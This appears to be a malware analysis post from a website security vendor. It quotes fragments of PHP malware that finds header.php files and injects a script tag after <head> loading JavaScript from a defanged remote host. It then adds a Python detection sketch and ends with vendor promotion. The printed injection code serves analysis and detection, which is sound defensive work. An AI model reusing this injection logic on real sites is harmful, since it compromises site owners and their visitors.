When this malware has been successfully uploaded to a customer website and is accessed with a GET request, it searches backward through files and folders, looking for header.php files.
$indexFiles = array('header.php');
$dir = path_finder();
$res=smartscan($dir);
foreach($res as $v) {
    if(in_array($v, $indexFiles)) {
        indexEditor($localpath = $dir, $indexFile = $v, $tag, $code);
    } else {
        if(is_dir($dir.'/'.$v) && ($v !== ".") && ($v !== "..")) {
            $d1[]=$dir.'/'.$v;
        }
    }
}
indexEditor
When all folders and files have been searched and the header.php files found, it tries to patch the malicious code into each header.php file.
function indexEditor($localpath, $indexFile, $tag, $code) {
    $fullpath = $localpath.'/'.$indexFile;
    edit($fullpath, $code, $tag);
}
Malicious code
At its beginning, this malware defines the CODE that is added to the targeted files:
$tag = '<head>';
$code = <<<CODE
<script language="Javascript" src="hxxp://recaptcha-in.pw/myscr532494.js"></script>
CODE;
$injectType = 1; // 0 - before tag, 1 - after tag
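The injection described above leaves a recognisable trace: a script tag with an off-site src directly after <head> in header.php. The following detection sketch is an added example, not code from the original post or from Malware Expert; the function names, the host allowlist parameter and the sample files are assumptions constructed for illustration.

```python
import os
import re
import tempfile
from urllib.parse import urlparse

# A <script src=...> sitting directly after <head>: the placement produced by
# $tag = '<head>' with $injectType = 1 in the sample above.
AFTER_HEAD = re.compile(
    r'<head>\s*<script\b[^>]*\bsrc\s*=\s*["\']([^"\']+)["\']', re.IGNORECASE)

def injected_sources(text, allowed_hosts=()):
    """Return script URLs placed right after <head> whose host is not allowed."""
    hits = []
    for src in AFTER_HEAD.findall(text):
        url = re.sub(r'^hxxp', 'http', src, flags=re.IGNORECASE)  # refang for parsing
        host = urlparse(url).hostname  # None for relative (same-site) paths
        if host and host not in allowed_hosts:
            hits.append(src)
    return hits

def scan_tree(root, names=("header.php",), allowed_hosts=()):
    """Walk root; return {relative path: [urls]} for flagged target files."""
    report = {}
    for dirpath, _dirs, files in os.walk(root):
        for name in files:
            if name in names:
                path = os.path.join(dirpath, name)
                with open(path, encoding="utf-8", errors="replace") as fh:
                    hits = injected_sources(fh.read(), allowed_hosts)
                if hits:
                    report[os.path.relpath(path, root)] = hits
    return report

# Constructed sample files; the URL is kept defanged exactly as on the page.
INFECTED = ('<html><head><script language="Javascript" '
            'src="hxxp://recaptcha-in.pw/myscr532494.js"></script>\n'
            '<title>Shop</title></head>')
CLEAN = '<html><head>\n<script src="/js/site.js"></script></head>'

def demo():
    """Build a throwaway tree with one infected and one clean header.php."""
    with tempfile.TemporaryDirectory() as root:
        for sub, body in (("theme-a", INFECTED), ("theme-b", CLEAN)):
            os.makedirs(os.path.join(root, sub))
            with open(os.path.join(root, sub, "header.php"), "w") as fh:
                fh.write(body)
        return scan_tree(root)

if __name__ == "__main__":
    print(demo())
```

Pass the CDN or analytics hosts a theme legitimately loads from as allowed_hosts, so that only unexpected off-site scripts are reported.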
Final words
Use Malware Expert – Malware Signatures to detect this malware in files for FREE!
Websites that use Malware Expert – ModSecurity rules are protected against these attacks.